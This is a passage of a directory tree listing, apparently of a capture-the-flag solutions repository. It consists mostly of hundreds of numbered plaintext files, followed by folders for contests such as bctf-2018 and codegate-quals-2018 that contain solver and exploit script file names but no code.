│ │ ├── plaintext_188 │ │ │ │ ├── plaintext_189 │ │ │ │ ├── plaintext_190 │ │ │ │ ├── plaintext_191 │ │ │ │ ├── plaintext_192 │ │ │ │ ├── plaintext_193 │ │ │ │ ├── plaintext_194 │ │ │ │ ├── plaintext_195 │ │ │ │ ├── plaintext_196 │ │ │ │ ├── plaintext_197 │ │ │ │ ├── plaintext_198 │ │ │ │ ├── plaintext_199 │ │ │ │ ├── plaintext_200 │ │ │ │ ├── plaintext_201 │ │ │ │ ├── plaintext_202 │ │ │ │ ├── plaintext_203 │ │ │ │ ├── plaintext_204 │ │ │ │ ├── plaintext_205 │ │ │ │ ├── plaintext_206 │ │ │ │ ├── plaintext_207 │ │ │ │ ├── plaintext_208 │ │ │ │ ├── plaintext_209 │ │ │ │ ├── plaintext_210 │ │ │ │ ├── plaintext_211 │ │ │ │ ├── plaintext_212 │ │ │ │ ├── plaintext_213 │ │ │ │ ├── plaintext_214 │ │ │ │ ├── plaintext_215 │ │ │ │ ├── plaintext_216 │ │ │ │ ├── plaintext_217 │ │ │ │ ├── plaintext_218 │ │ │ │ ├── plaintext_219 │ │ │ │ ├── plaintext_220 │ │ │ │ ├── plaintext_221 │ │ │ │ ├── plaintext_222 │ │ │ │ ├── plaintext_223 │ │ │ │ ├── plaintext_224 │ │ │ │ ├── plaintext_225 │ │ │ │ ├── plaintext_226 │ │ │ │ ├── plaintext_227 │ │ │ │ ├── plaintext_228 │ │ │ │ ├── plaintext_229 │ │ │ │ ├── plaintext_230 │ │ │ │ ├── plaintext_231 │ │ │ │ ├── plaintext_232 │ │ │ │ ├── plaintext_233 │ │ │ │ ├── plaintext_234 │ │ │ │ ├── plaintext_235 │ │ │ │ ├── plaintext_236 │ │ │ │ ├── plaintext_237 │ │ │ │ ├── plaintext_238 │ │ │ │ ├── plaintext_239 │ │ │ │ ├── plaintext_240 │ │ │ │ ├── plaintext_241 │ │ │ │ ├── plaintext_242 │ │ │ │ ├── plaintext_243 │ │ │ │ ├── plaintext_244 │ │ │ │ ├── plaintext_245 │ │ │ │ ├── plaintext_246 │ │ │ │ ├── plaintext_247 │ │ │ │ ├── plaintext_248 │ │ │ │ ├── plaintext_249 │ │ │ │ ├── plaintext_250 │ │ │ │ ├── plaintext_251 │ │ │ │ ├── plaintext_252 │ │ │ │ ├── plaintext_253 │ │ │ │ ├── plaintext_254 │ │ │ │ ├── plaintext_255 │ │ │ │ ├── plaintext_256 │ │ │ │ ├── plaintext_257 │ │ │ │ ├── plaintext_258 │ │ │ │ ├── plaintext_259 │ │ │ │ ├── plaintext_260 │ │ │ │ ├── plaintext_261 │ │ │ │ ├── plaintext_262 │ │ │ │ ├── plaintext_263 │ │ │ │ ├── plaintext_264 │ │ │ │ ├── plaintext_265 │ │ │ │ ├── plaintext_266 │ │ │ │ ├── plaintext_267 │ │ │ │ ├── plaintext_268 │ │ │ │ ├── plaintext_269 │ │ │ │ ├── plaintext_270 │ │ │ │ ├── plaintext_271 │ │ │ │ ├── plaintext_272 │ │ │ │ ├── plaintext_273 │ │ │ │ ├── plaintext_274 │ │ │ │ ├── plaintext_275 │ │ │ │ ├── plaintext_276 │ │ │ │ ├── plaintext_277 │ │ │ │ ├── plaintext_278 │ │ │ │ ├── plaintext_279 │ │ │ │ ├── plaintext_280 │ │ │ │ ├── plaintext_281 │ │ │ │ ├── plaintext_282 │ │ │ │ ├── plaintext_283 │ │ │ │ ├── plaintext_284 │ │ │ │ ├── plaintext_285 │ │ │ │ ├── plaintext_286 │ │ │ │ ├── plaintext_287 │ │ │ │ ├── plaintext_288 │ │ │ │ ├── plaintext_289 │ │ │ │ ├── plaintext_290 │ │ │ │ ├── plaintext_291 │ │ │ │ ├── plaintext_292 │ │ │ │ ├── plaintext_293 │ │ │ │ ├── plaintext_294 │ │ │ │ ├── plaintext_295 │ │ │ │ ├── plaintext_296 │ │ │ │ ├── plaintext_297 │ │ │ │ ├── plaintext_298 │ │ │ │ ├── plaintext_299 │ │ │ │ ├── plaintext_300 │ │ │ │ ├── plaintext_301 │ │ │ │ ├── plaintext_302 │ │ │ │ ├── plaintext_303 │ │ │ │ ├── plaintext_304 │ │ │ │ ├── plaintext_305 │ │ │ │ ├── plaintext_306 │ │ │ │ ├── plaintext_307 │ │ │ │ ├── plaintext_308 │ │ │ │ ├── plaintext_309 │ │ │ │ ├── plaintext_310 │ │ │ │ ├── plaintext_311 │ │ │ │ ├── plaintext_312 │ │ │ │ ├── plaintext_313 │ │ │ │ ├── plaintext_314 │ │ │ │ ├── plaintext_315 │ │ │ │ ├── plaintext_316 │ │ │ │ ├── plaintext_317 │ │ │ │ ├── plaintext_318 │ │ │ │ ├── plaintext_319 │ │ │ │ ├── plaintext_320 │ │ │ │ ├── plaintext_321 │ │ │ │ ├── plaintext_322 │ │ │ │ ├── plaintext_323 │ │ │ │ ├── plaintext_324 │ │ │ │ ├── plaintext_325 │ │ │ │ ├── plaintext_326 │ │ │ │ ├── plaintext_327 │ │ │ │ ├── plaintext_328 │ │ │ │ ├── plaintext_329 │ │ │ │ ├── plaintext_330 │ │ │ │ ├── plaintext_331 │ │ │ │ ├── plaintext_332 │ │ │ │ ├── plaintext_333 │ │ │ │ ├── plaintext_334 │ │ │ │ ├── plaintext_335 │ │ │ │ ├── plaintext_336 │ │ │ │ ├── plaintext_337 │ │ │ │ ├── plaintext_338 │ │ │ │ ├── plaintext_339 │ │ │ │ ├── plaintext_340 │ │ │ │ ├── plaintext_341 │ │ │ │ ├── plaintext_342 │ │ │ │ ├── plaintext_343 │ │ │ │ ├── plaintext_344 │ │ │ │ ├── plaintext_345 │ │ │ │ ├── plaintext_346 │ │ │ │ ├── plaintext_347 │ │ │ │ ├── plaintext_348 │ │ │ │ ├── plaintext_349 │ │ │ │ ├── plaintext_350 │ │ │ │ ├── plaintext_351 │ │ │ │ ├── plaintext_352 │ │ │ │ ├── plaintext_353 │ │ │ │ ├── plaintext_354 │ │ │ │ ├── plaintext_355 │ │ │ │ ├── plaintext_356 │ │ │ │ ├── plaintext_357 │ │ │ │ ├── plaintext_358 │ │ │ │ ├── plaintext_359 │ │ │ │ ├── plaintext_360 │ │ │ │ ├── plaintext_361 │ │ │ │ ├── plaintext_362 │ │ │ │ ├── plaintext_363 │ │ │ │ ├── plaintext_364 │ │ │ │ ├── plaintext_365 │ │ │ │ ├── plaintext_366 │ │ │ │ ├── plaintext_367 │ │ │ │ ├── plaintext_368 │ │ │ │ ├── plaintext_369 │ │ │ │ ├── plaintext_370 │ │ │ │ ├── plaintext_371 │ │ │ │ ├── plaintext_372 │ │ │ │ ├── plaintext_373 │ │ │ │ ├── plaintext_374 │ │ │ │ ├── plaintext_375 │ │ │ │ ├── plaintext_376 │ │ │ │ ├── plaintext_377 │ │ │ │ ├── plaintext_378 │ │ │ │ ├── plaintext_379 │ │ │ │ ├── plaintext_380 │ │ │ │ ├── plaintext_381 │ │ │ │ ├── plaintext_382 │ │ │ │ ├── plaintext_383 │ │ │ │ ├── plaintext_384 │ │ │ │ ├── plaintext_385 │ │ │ │ ├── plaintext_386 │ │ │ │ ├── plaintext_387 │ │ │ │ ├── plaintext_388 │ │ │ │ ├── plaintext_389 │ │ │ │ ├── plaintext_390 │ │ │ │ ├── plaintext_391 │ │ │ │ ├── plaintext_392 │ │ │ │ ├── plaintext_393 │ │ │ │ ├── plaintext_394 │ │ │ │ ├── plaintext_395 │ │ │ │ ├── plaintext_396 │ │ │ │ ├── plaintext_397 │ │ │ │ ├── plaintext_398 │ │ │ │ ├── plaintext_399 │ │ │ │ ├── plaintext_400 │ │ │ │ ├── plaintext_401 │ │ │ │ ├── plaintext_402 │ │ │ │ ├── plaintext_403 │ │ │ │ ├── plaintext_404 │ │ │ │ ├── plaintext_405 │ │ │ │ ├── plaintext_406 │ │ │ │ ├── plaintext_407 │ │ │ │ ├── plaintext_408 │ │ │ │ ├── plaintext_409 │ │ │ │ ├── plaintext_410 │ │ │ │ ├── plaintext_411 │ │ │ │ ├── plaintext_412 │ │ │ │ ├── plaintext_413 │ │ │ │ ├── plaintext_414 │ │ │ │ ├── plaintext_415 │ │ │ │ ├── plaintext_416 │ │ │ │ ├── plaintext_417 │ │ │ │ ├── plaintext_418 │ │ │ │ ├── plaintext_419 │ │ │ │ ├── plaintext_420 │ │ │ │ ├── plaintext_421 │ │ │ │ ├── plaintext_422 │ │ │ │ ├── plaintext_423 │ │ │ │ ├── plaintext_424 │ │ │ │ ├── plaintext_425 │ │ │ │ ├── plaintext_426 │ │ │ │ ├── plaintext_427 │ │ │ │ ├── plaintext_428 │ │ │ │ ├── plaintext_429 │ │ │ │ ├── plaintext_430 │ │ │ │ ├── plaintext_431 │ │ │ │ ├── plaintext_432 │ │ │ │ ├── plaintext_433 │ │ │ │ ├── plaintext_434 │ │ │ │ ├── plaintext_435 │ │ │ │ ├── plaintext_436 │ │ │ │ ├── plaintext_437 │ │ │ │ ├── plaintext_438 │ │ │ │ ├── plaintext_439 │ │ │ │ ├── plaintext_440 │ │ │ │ ├── plaintext_441 │ │ │ │ ├── plaintext_442 │ │ │ │ ├── plaintext_443 │ │ │ │ ├── plaintext_444 │ │ │ │ ├── plaintext_445 │ │ │ │ ├── plaintext_446 │ │ │ │ ├── plaintext_447 │ │ │ │ ├── plaintext_448 │ │ │ │ ├── plaintext_449 │ │ │ │ ├── plaintext_450 │ │ │ │ ├── plaintext_451 │ │ │ │ ├── plaintext_452 │ │ │ │ ├── plaintext_453 │ │ │ │ ├── plaintext_454 │ │ │ │ ├── plaintext_455 │ │ │ │ ├── plaintext_456 │ │ │ │ ├── plaintext_457 │ │ │ │ ├── plaintext_458 │ │ │ │ ├── plaintext_459 │ │ │ │ ├── plaintext_460 │ │ │ │ ├── plaintext_461 │ │ │ │ ├── plaintext_462 │ │ │ │ ├── plaintext_463 │ │ │ │ ├── plaintext_464 │ │ │ │ ├── plaintext_465 │ │ │ │ ├── plaintext_466 │ │ │ │ ├── plaintext_467 │ │ │ │ ├── plaintext_468 │ │ │ │ ├── plaintext_469 │ │ │ │ ├── plaintext_470 │ │ │ │ ├── plaintext_471 │ │ │ │ ├── plaintext_472 │ │ │ │ ├── plaintext_473 │ │ │ │ ├── plaintext_474 │ │ │ │ ├── plaintext_475 │ │ │ │ ├── plaintext_476 │ │ │ │ ├── plaintext_477 │ │ │ │ ├── plaintext_478 │ │ │ │ ├── plaintext_479 │ │ │ │ ├── plaintext_480 │ │ │ │ ├── plaintext_481 │ │ │ │ ├── plaintext_482 │ │ │ │ ├── plaintext_483 │ │ │ │ ├── plaintext_484 │ │ │ │ ├── plaintext_485 │ │ │ │ ├── plaintext_486 │ │ │ │ ├── plaintext_487 │ │ │ │ ├── plaintext_488 │ │ │ │ ├── plaintext_489 │ │ │ │ ├── plaintext_490 │ │ │ │ ├── plaintext_491 │ │ │ │ ├── plaintext_492 │ │ │ │ ├── plaintext_493 │ │ │ │ ├── plaintext_494 │ │ │ │ ├── plaintext_495 │ │ │ │ ├── plaintext_496 │ │ │ │ ├── plaintext_497 │ │ │ │ ├── plaintext_498 │ │ │ │ ├── plaintext_499 │ │ │ │ ├── plaintext_500 │ │ │ │ ├── plaintext_501 │ │ │ │ ├── plaintext_502 │ │ │ │ ├── plaintext_503 │ │ │ │ ├── plaintext_504 │ │ │ │ ├── plaintext_505 │ │ │ │ ├── plaintext_506 │ │ │ │ ├── plaintext_507 │ │ │ │ ├── plaintext_508 │ │ │ │ ├── plaintext_509 │ │ │ │ ├── plaintext_510 │ │ │ │ ├── plaintext_511 │ │ │ │ ├── plaintext_512 │ │ │ │ ├── plaintext_513 │ │ │ │ ├── plaintext_514 │ │ │ │ ├── plaintext_515 │ │ │ │ ├── plaintext_516 │ │ │ │ ├── plaintext_517 │ │ │ │ ├── plaintext_518 │ │ │ │ ├── plaintext_519 │ │ │ │ ├── plaintext_520 │ │ │ │ ├── plaintext_521 │ │ │ │ ├── plaintext_522 │ │ │ │ ├── plaintext_523 │ │ │ │ ├── plaintext_524 │ │ │ │ ├── plaintext_525 │ │ │ │ ├── plaintext_526 │ │ │ │ ├── plaintext_527 │ │ │ │ ├── plaintext_528 │ │ │ │ ├── plaintext_529 │ │ │ │ ├── plaintext_530 │ │ │ │ ├── plaintext_531 │ │ │ │ ├── plaintext_532 │ │ │ │ ├── plaintext_533 │ │ │ │ ├── plaintext_534 │ │ │ │ ├── plaintext_535 │ │ │ │ ├── plaintext_536 │ │ │ │ ├── plaintext_537 │ │ │ │ ├── plaintext_538 │ │ │ │ ├── plaintext_539 │ │ │ │ ├── plaintext_540 │ │ │ │ ├── plaintext_541 │ │ │ │ ├── plaintext_542 │ │ │ │ ├── plaintext_543 │ │ │ │ ├── plaintext_544 │ │ │ │ ├── plaintext_545 │ │ │ │ ├── plaintext_546 │ │ │ │ ├── plaintext_547 │ │ │ │ ├── plaintext_548 │ │ │ │ ├── plaintext_549 │ │ │ │ ├── plaintext_550 │ │ │ │ ├── plaintext_551 │ │ │ │ ├── plaintext_552 │ │ │ │ ├── plaintext_553 │ │ │ │ ├── plaintext_554 │ │ │ │ ├── plaintext_555 │ │ │ │ ├── plaintext_556 │ │ │ │ ├── plaintext_557 │ │ │ │ ├── plaintext_558 │ │ │ │ ├── plaintext_559 │ │ │ │ ├── plaintext_560 │ │ │ │ ├── plaintext_561 │ │ │ │ ├── plaintext_562 │ │ │ │ ├── plaintext_563 │ │ │ │ ├── plaintext_564 │ │ │ │ ├── plaintext_565 │ │ │ │ ├── plaintext_566 │ │ │ │ ├── plaintext_567 │ │ │ │ ├── plaintext_568 │ │ │ │ ├── plaintext_569 │ │ │ │ ├── plaintext_570 │ │ │ │ ├── plaintext_571 │ │ │ │ ├── plaintext_572 │ │ │ │ ├── plaintext_573 │ │ │ │ ├── plaintext_574 │ │ │ │ ├── plaintext_575 │ │ │ │ ├── plaintext_576 │ │ │ │ ├── plaintext_577 │ │ │ │ ├── plaintext_578 │ │ │ │ ├── plaintext_579 │ │ │ │ ├── plaintext_580 │ │ │ │ ├── plaintext_581 │ │ │ │ ├── plaintext_582 │ │ │ │ ├── plaintext_583 │ │ │ │ ├── plaintext_584 │ │ │ │ ├── plaintext_585 │ │ │ │ ├── plaintext_586 │ │ │ │ ├── plaintext_587 │ │ │ │ ├── plaintext_588 │ │ │ │ ├── plaintext_589 │ │ │ │ ├── plaintext_590 │ │ │ │ ├── plaintext_591 │ │ │ │ ├── plaintext_592 │ │ │ │ ├── plaintext_593 │ │ │ │ ├── plaintext_594 │ │ │ │ ├── plaintext_595 │ │ │ │ ├── plaintext_596 │ │ │ │ ├── plaintext_597 │ │ │ │ ├── plaintext_598 │ │ │ │ ├── plaintext_599 │ │ │ │ ├── plaintext_600 │ │ │ │ ├── plaintext_601 │ │ │ │ ├── plaintext_602 │ │ │ │ ├── plaintext_603 │ │ │ │ ├── plaintext_604 │ │ │ │ ├── plaintext_605 │ │ │ │ ├── plaintext_606 │ │ │ │ ├── plaintext_607 │ │ │ │ ├── plaintext_608 │ │ │ │ ├── plaintext_609 │ │ │ │ ├── plaintext_610 │ │ │ │ ├── plaintext_611 │ │ │ │ ├── plaintext_612 │ │ │ │ ├── plaintext_613 │ │ │ │ ├── plaintext_614 │ │ │ │ ├── plaintext_615 │ │ │ │ ├── plaintext_616 │ │ │ │ ├── plaintext_617 │ │ │ │ ├── plaintext_618 │ │ │ │ ├── plaintext_619 │ │ │ │ ├── plaintext_620 │ │ │ │ ├── plaintext_621 │ │ │ │ ├── plaintext_622 │ │ │ │ ├── plaintext_623 │ │ │ │ ├── plaintext_624 │ │ │ │ ├── plaintext_625 │ │ │ │ ├── plaintext_626 │ │ │ │ ├── plaintext_627 │ │ │ │ ├── plaintext_628 │ │ │ │ ├── plaintext_629 │ │ │ │ ├── plaintext_630 │ │ │ │ ├── plaintext_631 │ │ │ │ ├── plaintext_632 │ │ │ │ ├── plaintext_633 │ │ │ │ ├── plaintext_634 │ │ │ │ ├── plaintext_635 │ │ │ │ ├── plaintext_636 │ │ │ │ ├── plaintext_637 │ │ │ │ ├── plaintext_638 │ │ │ │ ├── plaintext_639 │ │ │ │ ├── plaintext_640 │ │ │ │ ├── plaintext_641 │ │ │ │ ├── plaintext_642 │ │ │ │ ├── plaintext_643 │ │ │ │ ├── plaintext_644 │ │ │ │ ├── plaintext_645 │ │ │ │ ├── plaintext_646 │ │ │ │ ├── plaintext_647 │ │ │ │ ├── plaintext_648 │ │ │ │ ├── plaintext_649 │ │ │ │ ├── plaintext_650 │ │ │ │ ├── plaintext_651 │ │ │ │ ├── plaintext_652 │ │ │ │ ├── plaintext_653 │ │ │ │ ├── plaintext_654 │ │ │ │ ├── plaintext_655 │ │ │ │ ├── plaintext_656 │ │ │ │ ├── plaintext_657 │ │ │ │ ├── plaintext_658 │ │ │ │ ├── plaintext_659 │ │ │ │ ├── plaintext_660 │ │ │ │ ├── plaintext_661 │ │ │ │ ├── plaintext_662 │ │ │ │ ├── plaintext_663 │ │ │ │ ├── plaintext_664 │ │ │ │ ├── plaintext_665 │ │ │ │ ├── plaintext_666 │ │ │ │ ├── plaintext_667 │ │ │ │ ├── plaintext_668 │ │ │ │ ├── plaintext_669 │ │ │ │ ├── plaintext_670 │ │ │ │ ├── plaintext_671 │ │ │ │ ├── plaintext_672 │ │ │ │ ├── plaintext_673 │ │ │ │ ├── plaintext_674 │ │ │ │ ├── plaintext_675 │ │ │ │ ├── plaintext_676 │ │ │ │ ├── plaintext_677 │ │ │ │ ├── plaintext_678 │ │ │ │ ├── plaintext_679 │ │ │ │ ├── plaintext_680 │ │ │ │ ├── plaintext_681 │ │ │ │ ├── plaintext_682 │ │ │ │ ├── plaintext_683 │ │ │ │ ├── plaintext_684 │ │ │ │ ├── plaintext_685 │ │ │ │ ├── plaintext_686 │ │ │ │ ├── plaintext_687 │ │ │ │ ├── plaintext_688 │ │ │ │ ├── plaintext_689 │ │ │ │ ├── plaintext_690 │ │ │ │ ├── plaintext_691 │ │ │ │ ├── plaintext_692 │ │ │ │ ├── plaintext_693 │ │ │ │ ├── plaintext_694 │ │ │ │ ├── plaintext_695 │ │ │ │ ├── plaintext_696 │ │ │ │ ├── plaintext_697 │ │ │ │ ├── plaintext_698 │ │ │ │ ├── plaintext_699 │ │ │ │ ├── plaintext_700 │ │ │ │ ├── plaintext_701 │ │ │ │ ├── plaintext_702 │ │ │ │ ├── plaintext_703 │ │ │ │ ├── plaintext_704 │ │ │ │ ├── plaintext_705 │ │ │ │ ├── plaintext_706 │ │ │ │ ├── plaintext_707 │ │ │ │ ├── plaintext_708 │ │ │ │ ├── plaintext_709 │ │ │ │ ├── plaintext_710 │ │ │ │ ├── plaintext_711 │ │ │ │ ├── plaintext_712 │ │ │ │ ├── plaintext_713 │ │ │ │ ├── plaintext_714 │ │ │ │ ├── plaintext_715 │ │ │ │ ├── plaintext_716 │ │ │ │ ├── plaintext_717 │ │ │ │ ├── plaintext_718 │ │ │ │ ├── plaintext_719 │ │ │ │ ├── plaintext_720 │ │ │ │ ├── plaintext_721 │ │ │ │ ├── plaintext_722 │ │ │ │ ├── plaintext_723 │ │ │ │ ├── plaintext_724 │ │ │ │ ├── plaintext_725 │ │ │ │ ├── plaintext_726 │ │ │ │ ├── plaintext_727 │ │ │ │ ├── plaintext_728 │ │ │ │ ├── plaintext_729 │ │ │ │ ├── plaintext_730 │ │ │ │ ├── plaintext_731 │ │ │ │ ├── plaintext_732 │ │ │ │ ├── plaintext_733 │ │ │ │ ├── plaintext_734 │ │ │ │ ├── plaintext_735 │ │ │ │ ├── plaintext_736 │ │ │ │ ├── plaintext_737 │ │ │ │ ├── plaintext_738 │ │ │ │ ├── plaintext_739 │ │ │ │ ├── plaintext_740 │ │ │ │ ├── plaintext_741 │ │ │ │ ├── plaintext_742 │ │ │ │ ├── plaintext_743 │ │ │ │ ├── plaintext_744 │ │ │ │ ├── plaintext_745 │ │ │ │ ├── plaintext_746 │ │ │ │ ├── plaintext_747 │ │ │ │ ├── plaintext_748 │ │ │ │ ├── plaintext_749 │ │ │ │ ├── plaintext_750 │ │ │ │ ├── plaintext_751 │ │ │ │ ├── plaintext_752 │ │ │ │ ├── plaintext_753 │ │ │ │ ├── plaintext_754 │ │ │ │ ├── plaintext_755 │ │ │ │ ├── plaintext_756 │ │ │ │ ├── plaintext_757 │ │ │ │ ├── plaintext_758 │ │ │ │ ├── plaintext_759 │ │ │ │ ├── plaintext_760 │ │ │ │ ├── plaintext_761 │ │ │ │ ├── plaintext_762 │ │ │ │ ├── plaintext_763 │ │ │ │ ├── plaintext_764 │ │ │ │ ├── plaintext_765 │ │ │ │ ├── plaintext_766 │ │ │ │ ├── plaintext_767 │ │ │ │ ├── plaintext_768 │ │ │ │ ├── plaintext_769 │ │ │ │ ├── plaintext_770 │ │ │ │ ├── plaintext_771 │ │ │ │ ├── plaintext_772 │ │ │ │ ├── plaintext_773 │ │ │ │ ├── plaintext_774 │ │ │ │ ├── plaintext_775 │ │ │ │ ├── plaintext_776 │ │ │ │ ├── plaintext_777 │ │ │ │ ├── plaintext_778 │ │ │ │ ├── plaintext_779 │ │ │ │ ├── plaintext_780 │ │ │ │ ├── plaintext_781 │ │ │ │ ├── plaintext_782 │ │ │ │ ├── plaintext_783 │ │ │ │ ├── plaintext_784 │ │ │ │ ├── plaintext_785 │ │ │ │ ├── plaintext_786 │ │ │ │ ├── plaintext_787 │ │ │ │ ├── plaintext_788 │ │ │ │ ├── plaintext_789 │ │ │ │ ├── plaintext_790 │ │ │ │ ├── plaintext_791 │ │ │ │ ├── plaintext_792 │ │ │ │ ├── plaintext_793 │ │ │ │ ├── plaintext_794 │ │ │ │ ├── plaintext_795 │ │ │ │ ├── plaintext_796 │ │ │ │ ├── plaintext_797 │ │ │ │ ├── plaintext_798 │ │ │ │ ├── plaintext_799 │ │ │ │ ├── plaintext_800 │ │ │ │ ├── plaintext_801 │ │ │ │ ├── plaintext_802 │ │ │ │ ├── plaintext_803 │ │ │ │ ├── plaintext_804 │ │ │ │ ├── plaintext_805 │ │ │ │ ├── plaintext_806 │ │ │ │ ├── plaintext_807 │ │ │ │ ├── plaintext_808 │ │ │ │ ├── plaintext_809 │ │ │ │ ├── plaintext_810 │ │ │ │ ├── plaintext_811 │ │ │ │ ├── plaintext_812 │ │ │ │ ├── plaintext_813 │ │ │ │ ├── plaintext_814 │ │ │ │ ├── plaintext_815 │ │ │ │ ├── plaintext_816 │ │ │ │ ├── plaintext_817 │ │ │ │ ├── plaintext_818 │ │ │ │ ├── plaintext_819 │ │ │ │ ├── plaintext_820 │ │ │ │ ├── plaintext_821 │ │ │ │ ├── plaintext_822 │ │ │ │ ├── plaintext_823 │ │ │ │ ├── plaintext_824 │ │ │ │ ├── plaintext_825 │ │ │ │ ├── plaintext_826 │ │ │ │ ├── plaintext_827 │ │ │ │ ├── plaintext_828 │ │ │ │ ├── plaintext_829 │ │ │ │ ├── plaintext_830 │ │ │ │ ├── plaintext_831 │ │ │ │ ├── plaintext_832 │ │ │ │ ├── plaintext_833 │ │ │ │ ├── plaintext_834 │ │ │ │ ├── plaintext_835 │ │ │ │ ├── plaintext_836 │ │ │ │ ├── plaintext_837 │ │ │ │ ├── plaintext_838 │ │ │ │ ├── plaintext_839 │ │ │ │ ├── plaintext_840 │ │ │ │ ├── plaintext_841 │ │ │ │ ├── plaintext_842 │ │ │ │ ├── plaintext_843 │ │ │ │ ├── plaintext_844 │ │ │ │ ├── plaintext_845 │ │ │ │ ├── plaintext_846 │ │ │ │ ├── plaintext_847 │ │ │ │ ├── plaintext_848 │ │ │ │ ├── plaintext_849 │ │ │ │ ├── plaintext_850 │ │ │ │ ├── plaintext_851 │ │ │ │ ├── plaintext_852 │ │ │ │ ├── plaintext_853 │ │ │ │ ├── plaintext_854 │ │ │ │ ├── plaintext_855 │ │ │ │ ├── plaintext_856 │ │ │ │ ├── plaintext_857 │ │ │ │ ├── plaintext_858 │ │ │ │ ├── plaintext_859 │ │ │ │ ├── plaintext_860 │ │ │ │ ├── plaintext_861 │ │ │ │ ├── plaintext_862 │ │ │ │ ├── plaintext_863 │ │ │ │ ├── plaintext_864 │ │ │ │ ├── plaintext_865 │ │ │ │ ├── plaintext_866 │ │ │ │ ├── plaintext_867 │ │ │ │ ├── plaintext_868 │ │ │ │ ├── plaintext_869 │ │ │ │ ├── plaintext_870 │ │ │ │ ├── plaintext_871 │ │ │ │ ├── plaintext_872 │ │ │ │ ├── plaintext_873 │ │ │ │ ├── plaintext_874 │ │ │ │ ├── plaintext_875 │ │ │ │ ├── plaintext_876 │ │ │ │ ├── plaintext_877 │ │ │ │ ├── plaintext_878 │ │ │ │ ├── plaintext_879 │ │ │ │ ├── plaintext_880 │ │ │ │ ├── plaintext_881 │ │ │ │ ├── plaintext_882 │ │ │ │ ├── plaintext_883 │ │ │ │ ├── plaintext_884 │ │ │ │ ├── plaintext_885 │ │ │ │ ├── plaintext_886 │ │ │ │ ├── plaintext_887 │ │ │ │ ├── plaintext_888 │ │ │ │ ├── plaintext_889 │ │ │ │ ├── plaintext_890 │ │ │ │ ├── plaintext_891 │ │ │ │ ├── plaintext_892 │ │ │ │ ├── plaintext_893 │ │ │ │ ├── plaintext_894 │ │ │ │ ├── plaintext_895 │ │ │ │ ├── plaintext_896 │ │ │ │ ├── plaintext_897 │ │ │ │ ├── plaintext_898 │ │ │ │ ├── plaintext_899 │ │ │ │ ├── plaintext_900 │ │ │ │ ├── plaintext_901 │ │ │ │ ├── plaintext_902 │ │ │ │ ├── plaintext_903 │ │ │ │ ├── plaintext_904 │ │ │ │ ├── plaintext_905 │ │ │ │ ├── plaintext_906 │ │ │ │ ├── plaintext_907 │ │ │ │ ├── plaintext_908 │ │ │ │ ├── plaintext_909 │ │ │ │ ├── plaintext_910 │ │ │ │ ├── plaintext_911 │ │ │ │ ├── plaintext_912 │ │ │ │ ├── plaintext_913 │ │ │ │ ├── plaintext_914 │ │ │ │ ├── plaintext_915 │ │ │ │ ├── plaintext_916 │ │ │ │ ├── plaintext_917 │ │ │ │ ├── plaintext_918 │ │ │ │ ├── plaintext_919 │ │ │ │ ├── plaintext_920 │ │ │ │ ├── plaintext_921 │ │ │ │ ├── plaintext_922 │ │ │ │ ├── plaintext_923 │ │ │ │ ├── plaintext_924 │ │ │ │ ├── plaintext_925 │ │ │ │ ├── plaintext_926 │ │ │ │ ├── plaintext_927 │ │ │ │ ├── plaintext_928 │ │ │ │ ├── plaintext_929 │ │ │ │ ├── plaintext_930 │ │ │ │ ├── plaintext_931 │ │ │ │ ├── plaintext_932 │ │ │ │ ├── plaintext_933 │ │ │ │ ├── plaintext_934 │ │ │ │ ├── plaintext_935 │ │ │ │ ├── plaintext_936 │ │ │ │ ├── plaintext_937 │ │ │ │ ├── plaintext_938 │ │ │ │ ├── plaintext_939 │ │ │ │ ├── plaintext_940 │ │ │ │ ├── plaintext_941 │ │ │ │ ├── plaintext_942 │ │ │ │ ├── plaintext_943 │ │ │ │ ├── plaintext_944 │ │ │ │ ├── plaintext_945 │ │ │ │ ├── plaintext_946 │ │ │ │ ├── plaintext_947 │ │ │ │ ├── plaintext_948 │ │ │ │ ├── plaintext_949 │ │ │ │ ├── plaintext_950 │ │ │ │ ├── plaintext_951 │ │ │ │ ├── plaintext_952 │ │ │ │ ├── plaintext_953 │ │ │ │ ├── plaintext_954 │ │ │ │ ├── plaintext_955 │ │ │ │ ├── plaintext_956 │ │ │ │ ├── plaintext_957 │ │ │ │ ├── plaintext_958 │ │ │ │ ├── plaintext_959 │ │ │ │ ├── plaintext_960 │ │ │ │ ├── plaintext_961 │ │ │ │ ├── plaintext_962 │ │ │ │ ├── plaintext_963 │ │ │ │ ├── plaintext_964 │ │ │ │ ├── plaintext_965 │ │ │ │ ├── plaintext_966 │ │ │ │ ├── plaintext_967 │ │ │ │ ├── plaintext_968 │ │ │ │ ├── plaintext_969 │ │ │ │ ├── plaintext_970 │ │ │ │ ├── plaintext_971 │ │ │ │ ├── plaintext_972 │ │ │ │ ├── plaintext_973 │ │ │ │ ├── plaintext_974 │ │ │ │ ├── plaintext_975 │ │ │ │ ├── plaintext_976 │ │ │ │ ├── plaintext_977 │ │ │ │ ├── plaintext_978 │ │ │ │ ├── plaintext_979 │ │ │ │ ├── plaintext_980 │ │ │ │ ├── plaintext_981 │ │ │ │ ├── plaintext_982 │ │ │ │ ├── plaintext_983 │ │ │ │ ├── plaintext_984 │ │ │ │ ├── plaintext_985 │ │ │ │ ├── plaintext_986 │ │ │ │ ├── plaintext_987 │ │ │ │ ├── plaintext_988 │ │ │ │ ├── plaintext_989 │ │ │ │ ├── plaintext_990 │ │ │ │ ├── plaintext_991 │ │ │ │ ├── plaintext_992 │ │ │ │ ├── plaintext_993 │ │ │ │ ├── plaintext_994 │ │ │ │ ├── plaintext_995 │ │ │ │ ├── plaintext_996 │ │ │ │ ├── plaintext_997 │ │ │ │ ├── plaintext_998 │ │ │ │ └── plaintext_999 │ │ │ ├── get_flag.py │ │ │ └── solve.sage │ │ ├── pwn/ │ │ │ ├── Junior-Stringmaster2/ │ │ │ │ ├── solve.py │ │ │ │ ├── stringmaster2 │ │ │ │ └── stringmaster2.cpp │ │ │ └── collection/ │ │ │ └── exp.py │ │ └── re/ │ │ └── box_of_blink/ │ │ ├── blink2.csv │ │ └── exp.py │ ├── bctf-2018/ │ │ ├── blockchain/ │ │ │ └── fake3d/ │ │ │ └── fake.js │ │ └── pwn/ │ │ └── easiest/ │ │ ├── easiest │ │ └── exp.py │ ├── codegate-quals-2018/ │ │ ├── pwn/ │ │ │ ├── BaskinRobins31/ │ │ │ │ ├── BaskinRobins31 │ │ │ │ └── solve_baskinrobins31.py │ │ │ ├── gamebox1/ │ │ 